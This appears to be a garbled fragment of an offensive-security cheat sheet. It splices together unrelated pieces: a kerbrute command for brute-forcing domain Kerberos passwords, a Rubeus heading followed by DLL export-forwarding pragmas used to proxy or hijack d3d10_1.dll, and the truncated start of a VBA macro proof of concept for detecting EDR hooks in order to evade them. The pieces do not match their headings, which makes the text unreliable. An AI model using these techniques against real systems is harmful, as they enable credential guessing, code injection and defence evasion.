With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#pragma comment(linker,"/export:D3D10CompileEffectFromMemory=d3d10_1_orig.D3D10CompileEffectFromMemory,@1")
#pragma comment(linker,"/export:D3D10CompileShader=d3d10_1_orig.D3D10CompileShader,@2")
#pragma comment(linker,"/export:D3D10CreateBlob=d3d10_1_orig.D3D10CreateBlob,@3")
#pragma comment(linker,"/export:D3D10CreateDevice1=d3d10_1_orig.D3D10CreateDevice1,@4")
#pragma comment(linker,"/export:D3D10CreateDeviceAndSwapChain1=d3d10_1_orig.D3D10CreateDeviceAndSwapChain1,@5")
#pragma comment(linker,"/export:D3D10CreateEffectFromMemory=d3d10_1_orig.D3D10CreateEffectFromMemory,@6")
#pragma comment(linker,"/export:D3D10CreateEffectPoolFromMemory=d3d10_1_orig.D3D10CreateEffectPoolFromMemory,@7")
#pragma comment(linker,"/export:D3D10CreateStateBlock=d3d10_1_orig.D3D10CreateStateBlock,@8")
#pragma comment(linker,"/export:D3D10DisassembleEffect=d3d10_1_orig.D3D10DisassembleEffect,@9")
#pragma comment(linker,"/export:D3D10DisassembleShader=d3d10_1_orig.D3D10DisassembleShader,@10")
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr